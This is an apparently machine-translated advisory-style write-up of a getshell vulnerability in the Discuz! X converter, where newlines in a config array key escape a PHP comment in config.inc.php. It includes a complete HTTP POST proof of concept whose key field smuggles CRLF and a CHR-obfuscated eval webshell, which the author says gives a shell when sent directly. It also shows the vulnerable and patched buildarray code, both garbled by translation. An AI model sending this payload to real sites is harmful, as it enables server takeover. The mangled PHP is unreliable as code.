discuz! X upgrade/converter Getshell Vulnerability via/convert/include/global.func.php Inject special Symbol Into/convert/data /config.inc.php

Source: Internet
Author: User



Directory


Vulnerability description
2. Vulnerability trigger conditions
3. The scope of the vulnerability
4. Vulnerability code analysis
5. Defense methods
6. Attack and defense thinking 





1. Vulnerability description



For PHP applications, it is important to be in the user's input and correctly delimit the "data-code" boundary, which is used by hackers to inject "delimiters (format depending on the scene)" into the input data, which translates the input data into code that can be executed by the target system to achieve the purpose of code injection execution.
The root cause of this vulnerability is a newline (delimiter) in the code comment (input data) that causes code injection execution



Relevant Link:


http://p2j.cn/?p=357
http://loudong.360.cn/blog/view/id/15
http://www.2cto.com/Article/201402/278766.html
http://drops.wooyun.org/papers/929



2. Vulnerability Trigger Condition


1. /convert/include/global.func.php does not effectively filter the user's input data (non-numbers, letters, underscores cannot exist)
2. /convert/data/config.inc.php directory can be written 


0x1: How to use it manually



http://localhost/discuz/utility/convert/index.php






http://localhost/discuz/utility/convert/index.php?a=config&source=d7.2_x2.0






You can set the properties of the data in the start settings, and the post data is written directly to the config.inc.php file.



0X2:POC Automated test methods


POST /DZ2/convert/ HTTP/1.1 Host: 192.168.52.129 Proxy-Connection: keep-alive
Content-Length: 925 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: null
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8

a=config&source=d7.2_x2.0&submit=yes&newconfig%5Btarget%5D%5Bdbhost%5D=localhost&newconfig%5Baaa%0D%0A%0D%0Aeval%28CHR%28101%29.CHR%28118%29.CHR%2897%29.CHR%28108%29.CHR%2840%29.CHR%2834%29.CHR%2836%29.CHR%2895%29.CHR%2880%29.CHR%2879%29.CHR%2883%29.CHR%2884%29.CHR%2891%29.CHR%2899%29.CHR%2893%29.CHR%2859%29.CHR%2834%29.CHR%2841%29.CHR%2859%29%29%3B%2F%2F%5D=localhost&newconfig%5Bsource%5D%5Bdbuser%5D=root&newconfig%5Bsource%5D%5Bdbpw%5D=&newconfig%5Bsource%5D%5Bdbname%5D=discuz&newconfig%5Bsource%5D%5Btablepre%5D=cdb_&newconfig%5Bsource%5D%5Bdbcharset%5D=&newconfig%5Bsource%5D%5Bpconnect%5D=1&newconfig%5Btarget%5D%5Bdbhost%5D=localhost&newconfig%5Btarget%5D%5Bdbuser%5D=root&newconfig%5Btarget%5D%5Bdbpw%5D=&newconfig%5Btarget%5D%5Bdbname%5D=discuzx&newconfig%5Btarget%5D%5Btablepre%5D=pre_&newconfig%5Btarget%5D%5Bdbcharset%5D=&newconfig%5Btarget%5D%5Bpconnect%5D=1&submit=%B1%A3%B4%E6%B7%FE%CE%F1%C6%F7%C9%E8%D6%C3


Send this request directly Getshell, malicious code written to/convert/data/config.inc.php file




3. Vulnerability Impact Range



Full Discuz version




4. Vulnerability Code Analysis



\discuz\utility\convert\index.php






\discuz\utility\convert\include\do_config.inc.php






\discuz\utility\convert\include\global.func.php






Follow in this getvars () function





Function buildarray($array, $level = 0, $pre = ‘$_config‘)
{
    Static $ks;
    If($level == 0)
    {
        $ks = array();
        $return = ‘‘;
    }

    Foreach ($array as $key => $val)
    {
        If($level == 0)
        {
            $newline = str_pad(‘ CONFIG ‘.strtoupper($key).‘ ‘, 50, ‘-‘, STR_PAD_BOTH);
            /*
            Here is the key to generating vulnerabilities
            1. DISCUZ's original intention is to use the key of the $config array as the "comment title" for each configuration area.
            2. $newline written to the configuration file depends on $key, and $key is controllable by the attacker.
            3. The correct boundary processing is not performed on the input data, causing the attacker to insert a newline character into the input data, escaping the scope of the annotation, thereby converting the input data into executable code.
                1) Line breaks
                2) ?>
            This type of delimiter can achieve the same effect.
            */
            $return .= "\r\n// $newline //\r\n";
        }

        $ks[$level] = $ks[$level - 1]."[‘$key‘]";
        If(is_array($val))
        {
            $ks[$level] = $ks[$level - 1]."[‘$key‘]";
            $return .= buildarray($val, $level + 1, $pre);
        }
        Else
        {
            $val = !is_array($val) && (!preg_match("/^\-?[1-9]\d*$/", $val) || strlen($val) > 12) ? '\' .addcslashes($val, '\'\\').'\'' : $val;
            $return .= $pre.$ks[$level - 1]."[‘$key‘]"." = $val;\r\n";
        }
    }
    Return $return;
}



5. Defense Methods


Function buildarray($array, $level = 0, $pre = ‘$_config‘)
{
    Static $ks;
    If($level == 0)
    {
        $ks = array();
        $return = ‘‘;
    }

    Foreach ($array as $key => $val)
    {
        / / Filter out non-letters, numbers and underscore characters in $key
        $key = preg_replace("/[^\w]/", "", $key);

        If($level == 0)
        {
            $newline = str_pad(‘ CONFIG ‘.strtoupper($key).‘ ‘, 50, ‘-‘, STR_PAD_BOTH);
            $return .= "\r\n// $newline //\r\n";
        }

        $ks[$level] = $ks[$level - 1]."[‘$key‘]";
        If(is_array($val))
        {
            $ks[$level] = $ks[$level - 1]."[‘$key‘]";
            $return .= buildarray($val, $level + 1, $pre);
        }
        Else
        {
            $val = !is_array($val) && (!preg_match("/^\-?[1-9]\d*$/", $val) || strlen($val) > 12) ? '\' .addcslashes($val, '\'\\').'\'' : $val;
            $return .= $pre.$ks[$level - 1]."[‘$key‘]"." = $val;\r\n";
        }
    }
    Return $return;
} 



6. Defensive Thinking



Copyright (c) Littlehann All rights reserved






discuz! X upgrade/converter Getshell Vulnerability via/convert/include/global.func.php Inject special Symbol Into/convert/data /config.inc.php


Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.